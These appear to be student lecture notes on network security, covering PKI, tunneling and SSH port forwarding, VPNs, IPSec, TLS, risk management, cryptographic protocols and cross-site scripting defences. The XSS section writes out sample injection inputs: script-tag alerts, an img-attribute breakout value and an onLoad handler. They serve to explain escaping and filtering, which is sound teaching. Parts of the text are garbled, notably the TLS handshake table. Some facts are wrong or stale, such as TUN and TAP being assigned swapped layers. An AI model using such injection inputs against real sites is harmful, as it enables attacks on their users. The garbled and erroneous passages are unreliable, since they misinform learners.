CRL is a list of certificates which can no longer be trusted. This is usually generated by a CA and distributed together with the CA's certificate to the client. What is the worst thing that can happen with certificate authority? I could find out later that I was tricked during the authentication stage. CA's come preloaded with browser. CA's aren't really vetted probably, you just

need to have enough money, and Microsoft will add you to the list of certificate authority. With CA's we are verifying a public key but not an identity. Purpose Authentication (certificates) Confidentiality (encryption) Integrity (checksum / hash) Validity (digital signatures) Advantages No shared secrets No key distribution issues Difficult to crack Disadvantages Computationally expensive Critical that public key identity is known Need for a trusted third party

PKI Architecture
Week8/NiceNotes/pkidiagram.png In the simplest view, PKI has main three groups: Certificate Authority (CA) This group consists of trusted organizations whose roles is merely to ensure that a certain certificate belongs to the real owner and has not been tampered by anyone. The CA achieves this objective by signing the certificate that has been submitted to them using the CA's private key. The public key of CA can be used by client to verify that the certificate signed by CA hasn't been tampered with. In order to prevent man in the middle attacks, the CA's certificate usually comes pre-installed on web browsers, Firefox. Server This group consists of the network nodes whose public certificate needs to be signed by a CA to ensure that it's certificate has not been tampered by the man in the middle attacks during the client request process. Client This group consists of the network nodes who requests certificates from servers. After the server's certificate has been received, the client then uses the CA's certificate, which is pre-installed, to verify that the certificate that they have received has not been tampered with by man in the middle attacks.

Tunneling
What is Tunneling?

Encapsulating a packet within another packet for transmission over a network

Definition - Tunneling, also known as "port forwarding," is the transmission of data intended for use only within a private, usually corporate network through a public network in such a way that the routing nodes in the public network are unaware that the transmission is part of a private network. Tunneling is generally done by encapsulating the private network data and protocol information within the public network transmission units so that the private network protocol information appears to the public network as data. Tunneling allows the use of the Internet, which is a public network, to convey data on behalf of a private network. One approach to tunneling is the Point-to-Point Tunneling Protocol (PPTP) developed by Microsoft and several other companies. The PPTP keeps proprietary data reasonably secure, even though part of the path(s) between or among end users exists in public communication channels. The PPTP makes it possible for authorized users to gain access to a private network - called a virtual private network (VPN) -through an Internet service provider (ISP) or online service. Another commonly used tunneling protocol is generic routing encapsulation (GRE), developed by Cisco Systems. There are numerous, less common tunneling protocols. Tunneling, and the use of a VPN, is not intended as a substitute for encryption/decryption. In cases where a high level of security is necessary, the strongest possible encryption should be used within the VPN itself, and tunneling should serve only as a convenience.

How does encapsulation work for Tunneling?


Encapsulation is the basis of networking. For example, HTTP is encapsulated by TCP, TCP is encapsulated by IP, and IP is often encapsulated in PPP or Ethernet. Encapsulating protocols in an unsual way is often refered as tunneling. As soon as you let a single protocol out, tunneling allows to let anything go through this protocol, and thus through the firewall. Example of what packet encapsulation for IPSec tunneling looks like:

Why Tunneling?
when packet carrying a payload over an incompatible delivery network(protocol incompatible and/or address incompatible) when we need a secure path through an untrusted network(encrypt insecure traffic over internet) when we need to send application data through a particular port(sneak through firewall)

Common ways of Tunneling


Securing traffic

Bypassing firewalls

Stream vs. Datagram tunneling


Stream - Connection between 2 endpoints. Data is put in one endpoint and sent to the other endpoint. e.g Phone call between 2 people. Once the call is established, all communications will be sent through the one connection. Datagram - Packets sent using an "unreliable" service, such as UDP. Datagrams are self contained i.e. each datagram has no relationship with the datagrams which come before or after them. e.g Sending text messages between 2 people. Each message is self contained and independent of the other messages.

Tunneling Protocols
Layer Application Layer Session Layer Transport Layer Network Layer Data Link Layer IPSec, IPV6, GRE PPPoE/PPPoA, PPTP L2TP Datagram-based Stream-based TLS/SSL, SSH SOCKS

Datagram-based: IPsec GRE (Generic Routing Encapsulation) supports multiple protocols and multiplexing IP in IP Tunneling Lower overhead than GRE and used when only 1 IP stream is to be tunneled L2TP (Layer 2 Tunneling Protocol) MPLS (Multi-Protocol Label Switching) GTP (GPRS Tunnelling Protocol) PPTP (Point-to-Point Tunneling Protocol) PPPoE (point-to-point protocol over Ethernet) PPPoA (point-to-point protocol over ATM) IEEE 802.1Q (Ethernet VLANs) DLSw (SNA over IP) XOT (X.25 datagrams over TCP) IPv6 tunneling: 6to4; 6in4; Teredo Anything In Anything (AYIYA; e.g. IPv6 over UDP over IPv4, IPv4 over IPv6, IPv6 over TCP IPv4, etc.)

Stream-based: TLS SSH SOCKS HTTP CONNECT command Various circuit-level proxy protocols, such as Microsoft Proxy Server's Winsock Redirection Protocol, or ?WinGate Winsock Redirection Service.

Pros and cons of tunneling


Pros: Tunneling provides a mean of bypassing firewalls Tunneling provides anonymity Tunneling provides encrypted connection Tunneling provides authenticated connection Tunneling provides connection that can be controlled by user administrative relationships Cons: Tunneling opens up a link outside of a secure network which may be compromised Tunneling makes firewalls ineffective Tunneling is difficult for network administrators to stop

HTTP Tunneling
What is HTTP Tunneling? HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. (a bidirectional virtual data connection tunnelled in HTTP requests) HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted network connectivity including firewalled networks, networks behind proxy servers, and NATs. What is HTTP Tunneling used for? An HTTP Tunnel is used most often as a means for communication from network locations with restricted connectivity - most often behind NATs, firewalls, or proxy servers, and most often with applications that lack native support for communication in such conditions of restricted connectivity. Restricted connectivity in the form of blocked TCP/IP ports, blocking traffic initiated from outside the network, or blocking of all network protocols except a few is a commonly used method to lock down a network to secure it against internal and external threats. By bypassing these restrictions, the following can be achieved: Surf the internet and post in forums anonymously by hiding your IP address

To use applications (games/IM clients/browsers) from behind restrictive firewalls or proxy servers To access blocked sites To achieve lower gaming pings when ISPs perform 'throttling' or 'packet shaping' How does HTTP Tunneling work? The application that wishes to communicate with a remote host opens an HTTP connection to a mediator server, which acts as a relay of communications to and from the remote host. The application then communicates with the mediator server using HTTP requests, encapsulating the actual communications within those requests. The mediator server is required to be in a network location with sufficiently unrestricted connectivity. The mediator server unwraps the actual data before forwarding it to the remote host in question. Symmetrically, when it receives data from the remote host, it wraps it in the HTTP protocol before sending it as part of an HTTP response to the application. In this situation, the application plays the role of a Tunneling Client, while the remote host plays the role of the server being communicated with.

How does HTTP Tunneling protocol work? When an HTTP connection is made through a proxy server the client (usually the browser) sends the request to the proxy. The proxy opens the connection to the destination, sends the request, receives the response and sends it back to the client. The HTTP protocol specifies a request method called CONNECT. The CONNECT method can be used by the client to inform the proxy server that a connection to some

host on some port is required. The proxy server, if allows such connections, tries to connect to the destination address specified in the request header. If it the operation fails it sends back to the client a negative HTTP response and close the connection. If the operation succeeded then send back an HTTP positive response and the connection is consider established. After that, the proxy does not care what data is transferred between client requesting the connection and the destination. It just forwards data in both ways acting as a tunnel. We are interested in CONNECT method from the HTTP protocol. After the applications opens a connection with the proxy server it must send the connect request in the form of an HTTP request:
CONNECT <destination_address>:<destination_port> <http_version><CR><LF> <header_line><CR><LF> <header_line><CR><LF> ... <header_line><CR><LF> <CR><LF>

The proxy server process the request and try to make a connection to <destionation_address>:<destination_port>. The proxy server sends back an HTTP response in the form:
<http_version> <code> <message><CR><LF> <header_line><CR><LF> <header_line><CR><LF> ... <header_line><CR><LF> <CR><LF>

If it is a positive response (code=200) then after the empty line the proxy begins to acts as a tunnel and forwards data. If it is a negative response (code!=200) then connection is closed after the empty line. Disadvantages of using HTTP Tunneling? the tunnel is public: anyone can use your tunnel. Your could be held liable for what anybody has done with your tunnel. the tunnel is cleartext: anyone can spy on your connection. Your passwords (SMTP, POP3, telnet...) are transmitted in clear text. the tunnel is not protected: anyone can alter the datastream. you have to run a new instance of the HTTP Tunnel client and the server for each new tunnel you want to set up. Countermeasures of HTTP Tunneling disadvantages? Use SSH. SSH provides: authentication (only authorised users can use the tunnel) privacy (no one can spy on what's going through the tunnel) integrity (no one can tamper data going through the tunnel) easy tunnel set-up (you can create a new tunnel with a single ssh command on the client side).

SSH Tunnelling
SSH (Secure Shell) is a protocol for creating a secure connection between two computers. Designed to replace Telnet and other insecure remote shells. Stream based tunneling. Provides authentication between end points. Encryption provides integrity. Can be used to create tunnels through forwarding(as demonstrated in Question 2 of VPN lab). Lab/TheoryReviewNote/ssh_tunnel.jpg 1. User is not able to connect to web server, but can ssh to intermediary server. 2. User creates ssh connection to intermediary server and configures it to forward all incoming traffic to the web server. 3. User then forwards all web traffic on their system to the ssh client, which forwards to the intermediary server. 4. Server forwards traffic to web server and forwards any received data back to the user's computer through the ssh tunnel. What is SSH Tunnelling? SSH Tunnelling is a common and useful way to tunnel insecure TCP protocols such as POP3, SMTP and HTTP through a secure communication channel. Example of SSH Tunnelling A good example of this is that normal pop3 traffic travels over the network as plaintext. These packets may also contain confidential data such as usernames, passwords and plans on how to take over the world. Some people may be upset if they found out your diabolical plan, which would be quite possible with a simple packet sniff of the un-encrpyted data as it proceeds through the network. To prevent this, we can use an SSH TUNNEL. Yay! For example, say we decided that it was about time to use a secure connection to the mail server, rather than a simple easily sniffable direct connection. This is achieved by establishing an SSH tunnel to the mail server with port forwarding.

ssh -L <local-port>:<destination-host>:<remote-port> <username@><remote-host>

The L flag basically says that we are setting up a tunnel to the <host> and use these settings. <local-port> is the unused local port that the mail client will now be using to send mail. <destination-host> is the computer that will perform this tunnelling. <remote-port> is the proper port number for the service you wish to use, in this example pop3 is located on port 110. <username@> is used if the user on the remote host that we are connecting to has a different username <remote-host> is the server that we wish to bounce through to with this tunnel. This is basically setting it up so that the mail traffic from your computer goes through the new local port that you set up with the ssh connection i.e. port 6222. The port forwarding that was set up via the SSH tunnel will forward the traffic from port 6222 on the mail server to the POP3 port, all in a secure manner. After setting the mail client to go through localhost:<local-port>, the pop3 traffic will now be encrypted as it passes through the SSH tunnel, and is therefore no longer in plaintext and would take a lot longer to break due to SSH's use of public and private keys. Because SSH is such a substantial protocol and allows users to tunnel through firewalls, it can pose as a serious security risk, which will be brought up later. Pros Easy to set up. Just requires SSH Daemon to be running on intermediary server. Cons Intermediary server must be reachable through the network. Firewalls can be routed around using SSH tunnels. This poses a potential security risk.

Virtual Private Network (VPN)


What is a VPN? Virtual network using shared public networking infrastructure (such as the Internet), to emulate the properties of an actual private network. A virtual network which is created based on a tunneling protocol. It is more than just tunneling through a port (like an ssh tunnel), as a VPN is an entire virtual network, created on top of a public network . Just like in real networks, two computers on a VPN can communicate freely (such as ping-ing) with each other. VPN is a computer network in which some of the links between nodes are carried by open connections or virtual circuits in some larger network (e.g., the Internet) instead of by physical wires. The link-layer protocols of the virtual network are said to be tunneled through the larger network when this is the case. One common application

is secure communications through the public Internet, but a VPN need not have explicit security features, such as authentication or content encryption. VPNs, for example, can be used to separate the traffic of different user communities over an underlying network with strong security features. A VPN may have best-effort performance, or may have a defined service level agreement (SLA) between the VPN customer and the VPN service provider. Generally, a VPN has a topology more complex than point-to-point. Tunneling protocols can be used in a point-to-point topology that would generally not be considered a VPN, because a VPN is expected to support arbitrary and changing sets of network nodes. Since most router implementations support software-defined tunnel interface, customer-provisioned VPNs are often simply a set of tunnels over which conventional routing protocols run. PPVPNs, however, need to support the coexistence of multiple VPNs, hidden from one another, but operated by the same service provider.

Why VPN? VPN is currently the most advanced form of anonymity and data security for use on the Internet. VPN users often have dynamic IP addresses and can have a different IP address with every connection that they make. The main difference between an SSL or SSH encrypted tunnel proxy and VPN (Virtual Private Network) tunnelling, is that VPN doesn't use a proxy and anonymizes and encrypts all activities. Both SSL and SSH encryption can be used with VPN as well as proxy servers. VPN Provides: Authentication before VPN Connection Trusted Delivery Networks Security mechanisms in the VPN Security and Mobility To sum up:

private networks (e.g. leased line) are expensive emulate the properties of private networks improved security protected from unauthorized access (authorization) confidentiality (data encryption) traffic protected from non-VPN users (authentication) predictable performance reliability low latency, low loss bandwidth guarantees Independent choice of network transport technologies Independent IP address space TUN/TAP Driver VPNs use simulated network adapters known as TUN/TAP adapters. These adapters are simulated using the kernel driver and the OS will deliver all packets which are sent/received from these adapters to the associated running VPN program, which will decide what to do with the packets appropriately. There are 2 kind adapters, which serve different purposes: TUN - simulated adapter is mainly used for routing and it operates with layer 2 packets (such as Ethernet frames). This is commonly used for merging two sites into a single network. TAP - simulated adapter is mainly used for network bridging and it operates with layer 3 packets (such as IP packets). This is commonly used for connecting individuals to a certain virtual network. Types of VPNs There are two main types of VPN: Routing mode Used to merge two sites. This VPN uses TUN driver. This type of VPN can be used to merge two networks which are separated physically. For example, combining an office network in the US and an office network in Australia. Lab/TheoryReviewNote/VPNsiteTosite.png Network Bridging mode Used to connect an individual to a network. This VPN uses TAP driver. This type of VPN can be used to connect an individual to the main network. For example, playing games which only support local area network connection with friends across internet. There are some commercial VPNs of this type available such as Hamachi. Lab/TheoryReviewNote/VPNnetworkbridge.png Network Bridging VPN Architecture The VPN setup consists of: VPN Server This userspace program acts like a network bridge for all VPN Client programs in that virtual network. All packets sent by and received from a VPN Client will go through this userspace program. VPN Client This userspace program will handle all packets which comes to/from the associated TAP adapter. In the case of an incoming packet: VPN Client receives an incoming packet from the opened port and injects the packet into the network stack of the associated TAP adapter. This effectively simulates an incoming packet from that TAP

adapter. Lab/TheoryReviewNote/incomingDataTAP.png In the case of an outgoing packet: Whenever a packet is sent to TAP adapter, the OS will pass those packets to the associated VPN Client, which then forwards them to the VPN Server. Lab/TheoryReviewNote/outgoingDataTAP.png Tunneling Protocols used by VPN Multi-Protocol Label Switching (MPLS) is often used to overlay VPNs, often with quality of service control over a trusted delivery network. Layer 2 Tunneling Protocol (L2TP) which is a standards-based replacement, and a compromise taking the good features from each, for two proprietary VPN protocols: Cisco's Layer 2 Forwarding (L2F)(now obsolete) and Microsoft's Point-to-Point Tunneling Protocol (PPTP). IPsec (IP security) - commonly used over IPv4, and a "standard option" in IPv6. SSL/TLS used either for tunneling the entire network stack, as in the OpenVPN project, or for securing what is, essentially, a web proxy. SSL is a framework more often associated with e-commerce, but it has been built-upon by a number of vendors to provide remote access VPN capabilities. A major practical advantage of an SSL-based VPN is that it can be accessed from the locations that restrict external access to SSL-based e-commerce websites only, thereby preventing VPN connectivity using IPsec protocols. SSL-based VPNs are vulnerable to trivial Denial of Service attacks mounted against their TCP connections because latter are inherently unauthenticated. OpenVPN, an open standard VPN. It is a variation of SSL-based VPN that is capable of running over UDP. Clients and servers are available for all major operating systems. L2TPv3 (Layer 2 Tunneling Protocol version 3), a new release. VPN Quarantine The client machine at the end of a VPN could be a threat and a source of attack; this has no connection with VPN design and is usually left to system administration efforts. There are solutions that provide VPN Quarantine services which run end point checks on the remote client while the client is kept in a quarantine zone until healthy. Microsoft ISA Server 2004/2006 together with VPN-Q 2006 from Winfrasoft or an application called QSS (Quarantine Security Suite) provide this functionality. MPVPN (Multi Path Virtual Private Network). VPN Methods remote-access VPNs (user-to-LAN) scenario: employees of a company connect to the company's LAN from various remote locations using VPNs.

site-to-site VPNs (LAN-to-LAN) Intranet-based scenario: a company has one or more remote locations that they wish

to join in a single VPN. Extranet-based scenario: a company has a close relationship with another company (for example, a partner, supplier or customer), they can build an extranet VPN, and that allows all of the various companies to work in a shared environment.

VPN implementation tunnelling secure channel for end-to-end data transmission a process of placing an entire packet within another packet and sending it over a network. Carrier protocol - The protocol used by the network that the information is traveling over Encapsulating protocol - The protocol (GRE, IPSec, L2F, PPTP, L2TP) that is wrapped around the original data Passenger protocol - The original data (IPX, ?NetBeui, IP) being carried authentication: two end points of a secure channel encryption

IP Security (IPSec)
Series of standards which provides enhanced security features (confidentiality, integrity, authentication) at the IP (level 3) layer. Can provide tunneling through IPsec Tunnel mode. IPSec is an internet security protocol that operates at the network layer, whereby most security protocols operate from the transport layer and higher. This allows IPSec to be simultaneously more, and less flexible than the other available protocols. JamesLennox/IPSec/Bsd_IPsec.png Firstly, as it is at the network layer we are encrypting everything above the IP level. Thus there is no distinction between TCP/UDP or other transport layer protocols. This means that all traffic for the intended destination (that which would travel through the tunnel) is encrypted without the knowledge or cooperation of the program controlling the stream. This is a great advantage when compared to protocols such as SSL which require explicit cooperation from the application and must be factored into the protocol design. Alternatively this also provides somewhat less flexibility than application level protocols. Because IPSec is established between the local host and a secure gateway, there is no way to ensure that all traffic from an application will be delivered through the encrypted tunnel. Whereas by working such encryption into the protocol

communication is secured without the need to separately create this tunnel, and not simply between the end-points of the tunnel. JamesLennox/IPSec/IPSec.jpg IPSec is an end-to-end security architecture, and is only secured between the two end points of the tunnel. However for this time it provides traffic security and integrity. It generally using IKE (the Internet Key Exchange) and sets up a group of parameters for the connection This includes things like the type of encryption protocol that is to be used, and the hosts involved. The advantages of this particular method are: Encrypting all traffic (cannot eavesdrop) Integrity validation (ensuring it has not been modified) Authentication of peers (ensures it is from the intended target) Anti-replay (cannot use a replay attack of a secure session) There are two IPsec modes: Transport: Only the payload is encrypted and the IP header is hashed for integrity. This means, however that the traffic cannot pass through NAT enabled routers as this will modify the header and invalidate the hash. It is therefore mainly intended for IPv6, however has yet to properly take off. Tunnel: The most common form of IPsec lends itself perfectly to VPNs. In tunnel mode all traffic is encrypted, even the original IP header and thus must be encapsulated again, however this provides the ability to be forwarded through firewalls etc as the IP header is no longer important to the original transmission. It also means that on de-capsulation (and decryption) the packet is routed as if coming from the receiving machine, allowing local network traffic to be simply, and securely tunneled over the internet.

Transport Layer Security (TLS) / Secure Socket Layer (SSL)


What is TLS/SSL SSL(Secure Socket Layer) when: protocol developed by Netscape in 1996, current version is 3.0 where: it runs above transport layer, in application layer goals: provide privacy and reliability between two communicating applications provides encryption, server and client authentication and message authentication TLS(Transport Layer Security) when: defined in 1999, current version is 1.0 more or less the same as SSL, while provides more security Algorithms involved major steps and the protocols involved are: Steps 1 Negociation Cipher Typical protocols

2 3 4 5

Key exchange Authentication Symmetric Cipher Message Authentication Codes (MACs)

RSA, Diffie-Hellman, ECDH, SRP, PSK RSA, DSA, ECDSA RC4, Triple DES, AES, IDEA, DES HMAC-MD5 / HMAC-SHA tls or MD5 / SHA for ssl

How it works two scenario: server only authentication / mutual authentication(both server & client got authenticated) let's see the mutual authentication: Client requests a secure channel, with a list of ciphers and hash functions it supports -> picks up the strongest cipher and hash func from the list and notify the choices sends its digital certification which includes server name, the trusted certificate authority (CA), and the server's public encryption key requests for the client's certification Server

<-

<-

<contacts the server that issued the certificate (the trusted CA as above) and confirm that the certificate is authentic or just terminates send its certification and a private key encrypted of the last message from the server ->

verify the client by decrypted the message with the client's public key create a random session key(symmetric key), encrypted with server's public key -> decrypts using its private key and gets the session key now they are ready to communicate using the symmetric session key Protocols involved Handshake protocol: responsible for creating secure communication between client and server Record protocol: define the actual exchange packet formats ?ChangeCipherSpec

Alert Handshake Application How the data packet is generated Fragmentation The data

information is fragmented into SSLPlaintext records of 2^14 bytes or less. Compression In this phase, the compression algorithm defined in the Handshake stage compresses the given SSLPlaintext. Compression must not lose any data. The result is called SSLCompressed. The SSLCompressed length must not exceed 2^14 + 1024. Applying MAC (Message Authentication Code) In this phase a MAC, which is defined in the Handshake stage, is attached to the SSLCompressed. The MAC is computed as follows: MAC-DATA = HASH ( MAC-WRITE-SECRET, PAD2, HASH ( MAC-WRITE-SECRET, PAD1, SEQUENCE-NUMBER, SSLCompressed.type, SSLCompressed.length, SSLCompressed.fragment ) ) The hash algorithm, used to compute the MAC, derives from the cipher suite. The MAC-WRITE-SECRET is a secret shared value between the client and server. PAD1 is 0x36 byte repeated 48 times for MD5 and 40 times for SHA. PAD2 is 0x5C byte repeated as PAD1. The SEQUENCE-NUMBER functions as a counter. Each party has two counters, one for transmitted messages and one for received ones. Every time a message is sent the counter is incremented. When a change-cipher -spec message is sent or received the counter is set to zero. SSL supports 2 hash function algorithms: MD5, a 128-bit hash. SHA ? Secure Hash Algorithm, a 160-bit hash. Encryption There are 2 types of cipher algorithms used in this section: a stream cipher and a

block cipher. When a stream cipher algorithm is used no padding is required. When using block ciphers, the data block needs to be a multiple of the block size, if it is not, padding is used to pad out the length of the data block to be a multiple of the block size of the cipher. The total length after encryption must not exceed 2^14+2048. What attacks does it prevent Preventing Identity Fraud Preventing Garbling Attacks Preventing Replaying Messages Preventing Cut and Paste Attacks Preventing ?CipherSuite rollback attacks Preventing Version rollback attacks Preventing Dictionary attacks Preventing Traffic attacks Preventing Short-block attacks Deployment Visa, ?MasterCard, American Express and many leading financial institutions have endorsed SSL for commerce over the Internet widely integrated with most modern web browers (IE, Firefox, Opera, Safari) Comparison of protocols Layer Application Layer Session Layer Transport Layer Network Layer Data Link Layer IPSec, IPV6, GRE PPPoE/PPPoA, PPTP L2TP Datagram-based Stream-based TLS/SSL, SSH SOCKS

Week8/NiceNotes
Risk
What is Risk?
Exposure to the chance of injury or loss Humans are bad at risk Something that might endanger you Uncertainty that you don't like You could completely ignore risk & most of the time you would be lucky. But what about the other times?...

Terminology

Flaw Vulnerability Threat Impact Risk

Something that's wrong Something that's wrong and exploiting it could be really bad Way of exploiting a vulnerability How serious it will be if a vulnerability is exploited Likelihood * impact (cost)

Measuring Risk:
Expected value (average) Lottery tickets - people like the large standard deviation Unlikely events are not well represented in historical data (basically we haven't got a clue how to measure them accurately) Use NIST framework for measuring risk

Risk as a Cycle:
1. 2. 3. 4. 5. Lots of crime occurring therefore increase security Lots of security therefore no crime No crime therefore why are we spending so much money on security?? Decrease security which eventually results in increased crime Back to step 1.

Risk vs Uncertainty:
What could happen? What is the chance of that happening? People are more uncertainty averse rather than risk averse

Dealing with Risk


We can't avoid risk completely, we need to try and distribute our resources wisely to deal with the most serious risks Avoid the risk Mitigating risk - is reducing the impact by trying to affect how bad it can be or reducing the chance of it happening. (e.g. in investment, distribute your assets over a range of companies/resources, rather than going all in on one company) Transfer the risk give the risk to someone else (e.g. through insurance) Accept the risk Safety-critical systems one thing fails, all fails. Probabilitic safety (2 parachutes) Inherent safety (designed in such a way that it's forced to be safe, i.e. traffic lights design with a wire that makes it physically impossible to have lights both go green in opposing directions) Fail-safe - if something fails you're okay Fault tolerance - fail-over systems, backups Dual control: front room and back room people are different (and separated)

Risk Analysis & Management:


Exam Question:

CSE downsizing & staff told that 40% will lose their jobs in x months Risk: Disgruntled staff Could do something malicious (eg. steal data) Solution: Avoid, mitigate, transfer, accept Deal with risk: How can you prevent this happening? How can you reduce the impact? How can you detect the risk? What do you want to happen? Dealing with unknowns: If dealing with a situation of unknowns: Write down everything that could go wrong Try and assign a likelihood to each (eg. not likely, likely, very likely) Try and assign an impact to each (eg. not serious, serious, very serious) Focus on the very likely and very serious ones!

PKI:
Problem with public key crypto - trust PKI: trusted 3rd parties (CA's) Homework:
1. Research the following and determine "what went wrong?" * Chernobyl * The China Syndrome (Three Mile Island)

Protocol
A protocol is the set of rules governing how two or more parties can communicate and interact.

What is a protocol?
Like an algorithm but with multiple parties communicating Algorithm: Set of precise steps starting from known start space and ending with a specific result

Secret splitting:
How can you have 2 people each knowing part of a secret but neither knowing any information until they come together and share what they know? XOR the secret with a random string. Give person 1 the result of the XOR and person 2 the random string (Neither will know the secret until they swap what they know) Encrypt it with everyone's public key (problem: need to be able to trust everyone not to cheat)

Cryptographic Protocols:

Session hijacking Self enforcing protocols are preferred Sublumninal channels (sometimes protocols can have these) How do you stop a covert channel? Coin tossing over a phone: (doing it the normal way you can't trust that it is done fairly) 1. Each create a message (last bit of message corresponds to head or tail (eg. 1 for heads, 0 for tails). 2. Hash it (using a cryptographic hash - ie. 2 different messages can never produce the same hash) and send hash to each other This is a second pre-image attack Homework
2. How can you extend the "you cut, I choose" cake protocol to 3 people?

Some examples of protocols would be: TCP/IP FTP Telnet SSH POP3 A cryptographic protocol defines the way secret messages are sent and received between parties. Cryptographic protocols are usually defined with many purposes in mind, depending on the situation. Some examples of cryptographic protocol use would be to: Exchange secret information Achieve a transaction (Electronic Commerce) Authenticate one, some or all the agents Vote Protect Copyright on digital content Some things cryptographic protocols address: Non-Repudiation: prevent one of the parties later denying that they sent the message Authentication: so you can identify of sender Confidentiality: so that you can encrypt the contents of the message

Attacks on Cryptographic Protocols


Some examples of attacks on cryptographic protocols would be1 Known-key attack: Specific key deduced by obtaining keys used previously Replay: Communication sequence recorded and re-used later to violate security Impersonation: Adversary assumes identity of a legitimate party Dictionary attack: List of probably values successfully matched against specific value Forward search: Similar to dictionary attack, used for decrypting a secret

Interleaving attack: Unauthorized messages substituted into an authorized sequence

Cross-site Scripting (XSS)


A script is a series of instructions, written in text, and interpreted by some scripting runtime. By this point, we've all seen at least half a dozen scripting languages: Perl, PHP, Bash, JSP, ASP, ?JavaScript, Python (arguably), Windows ?PowerShell (if you're unlucky), VBScript (if you're really unlucky), etc. In a web context, these break down into two categories: client-side and server-side scripts, depending on where they're executed.

Server-side scripting
Server-side scripting is used by webservers as a means of generating dynamic content. CGI is a simple example: the server, when given a request to a CGI app, will execute that app, and feed its output back to the client. PHP, JSP and ASP are all scripting languages designed specifically for server-side applications, and Perl is a general-purpose scripting language with a large array of libraries and modules for this purpose. This might seem a simple concept, but the web as we know it today wouldn't exist without server-side scripting. Scripts can do anything, from consulting a webpage index (such as in a search engine), to accessing bank account data (as on an Internet banking site), to generating graphs of the latest minute-to-minute share-trading data, or inserting large blocks of text into a hyperfast database (as in a blogging site).

Client-side scripting
Client-side scripting is the major driving technology behind the DHTML movement from the 90s, as well as its Web 2.0 reincarnation. In this case, the server sends a webpage with some embedded script (generally in ?JavaScript, but some [evil] websites use VBScript). The user's browser, noticing the <SCRIPT> tags, then starts the appropriate interpreter (if available), and executes the script. In the DHTML days this was mainly used for client-side form-input validation (we've all seen those hideously irritating "you must insert a number" message boxes on web forms) and making page elements change color, pop, and explode in response to user input. With the advent of faster computers, more powerful ?JavaScript runtimes, and the Web 2.0 concept, client-side scripting now also forms the basis of a substantial (and growing) number of web-based applications, in which an entire app exists within a small number of web pages whose content radically changes, much like a regular desktop app. Shining examples include Google's offerings (particularly GMail, Google Calendar, and Google Docs) and New Facebook.

The Scripting Problem


With great power, comes great responsibility. Scripting is extremely powerful, but it has a fundamental problem: you, as a user, are downloading and executing completely untrusted code from a remote machine, and it's often being executed without any interaction with you, with your user account's privileges. Worse, most Microsoft Windows users are administrators by default - meaning they have privileges equivalent to the UNIX root user (no self-respecting UNIXer, by contrast, would ever run Firefox as root without an insanely good reason). Remote system-level untrusted code execution. The biggest security nightmare in the known universe. And the gooiest candy an attacker could possibly desire.

Of course, this isn't quite as bad as it sounds. Modern browsers run scripts in a 'sandbox' that heavily restricts their actions. Moreover, client-side scripting languages can only do dangerous things (such as access the filesystem, or modify registry settings) with some difficulty (unless you use Microsoft Internet Explorer, have a site using VBScript, and have allowed some rogue ActiveX control to run...). And indeed, this has been highly successful in protecting web users from malicious websites. Basic cross-site exploits are also guarded by browsers, by forbidding scripts from contacting servers outside their domain of origin - so, for example, a script on mail.google.com wouldn't be able to contact evil.hacker.com, but might be able to talk to calendar.google.com (if it's lucky).

Cross-site scripting
Cross-site scripting is a different breed of attack. Rather than taking advantage of a vulnerability in client-side scripting engines, XSS focuses on servers. XSS attacks subvert a web application, causing its users to unwittingly leak information into the attacker's waiting hands. At its root, an XSS vulnerability is a server-side hole which allows web application users to inject code into server-generated pages, potentially causing other users to execute them as if they had come from the application itself. Ultimately, an XSS vulnerability is the same as any other vulnerability: how do we distinguish between code and data?

Type Of XSS Attacks


Non-Persistent
Also known as reflected XSS. Malicious code is reflected back from the server in response to some input. Typically requires some form of social engineering as well, since code would normally affect only immediate local pages. Example: Use a link embedded with some malicious code, and convince other users to visit said link.

Persistent
Also known as store XSS. Malicious code is stored on the server and then sent to other users. Commonly found on sites where input is stored on the server, eg. blogs and message boards. Example: Post some malicious code on a vulnerable message board, which ends up being executed by all users who view that post.

Defence Against XSS Attacks


Server Defence
Server defence is to stop the injection of malicious code in the web application. We should check for every single input that user provide. Escaping Escaping means making some significant character not executable. For example, a user might leave a smiley on a forum such as " \(>.<)/ " which has < (the HTML tag

delimiter). In order for this and other special characters not to break pages, we need to escape them. Then, when browsers see the escaped character(s), they will display them as normal characters, rather than interpreting them as HTML metacharacters - in this example, when you view page source, you'll see &gt instead of >, so the code will not be run as a script because there are no HTML tags. " \(>.<)/ " => \(&gt;.&lt;)/ When a attacker tries to inject malicious code onto the forum, <script>alert('test')</script> becomes &lt;script&gt;alert('test')&lt;/script&gt; which will not get executed. Filtering If we are going to allow for html input, we may want to only allow certain tags. <BR> , <LF> , <IMG> , <HREF>, these tags are often necessary to user. We will block all potential dangerous tags. E.g. <PLAINTEXT> tag is something we would want to block. If you were on a message board, and an attacker inserted <plaintext> tag, the whole thread will get turned into plain text when the next user views it. When we parse out HTML, we will first see which tag it is. If this tag is allowed, we will find the first >, and strip the attributes out, and reconstruct our own clean tag, containing only the attributes we want to permit. This prevents attacker injecting malicious code after (or in) permissible tag attributes. E.g. <img src= <%Response.Write(Request.QueryString('nextimg'))%>

If Request.QueryString('nexttimeg') evaluates to http://www.dynamicdrive.com/cssexamples/media/uplift.jpg> <script>alert then the tag will look like <img src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg> <s We first see it is a image tag, which is on our granted list. Then we will find the first >. We will grab src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg. Validate (mentioned later in validation section) and put it into our own clean img tag. < img src= http://www.dynamicdrive.com/cssexamples/media/uplift.jpg> This will prevent attacker injecting malicious code in attributes. Input Validation From the previous example , the image tag, we will have to validate whether its an valid attribute. For an image, allowed formats are .jpg , .png ,etc. Deny anything with dodgy extensions such as "php" or "js". This is just validating the input to see if it is in the expected format. For example if the form is for phone number, we expect an 8 digit number, no text, spaces or punctuation or anything else. If anything doesn't match the expected, throw an error. Eliminating Scripts It is IMPORTANT and a MUST to eliminate scripts from input including tags , attributes and any links. Scripting is very dangerous, <body onLoad=" function ha(){alert('*Yawn*..me tired') }; ha();"> once you can write code, write functions, call functions, you can do anything. To reduce the risk of having the script identified as malicious, the attacker might encode

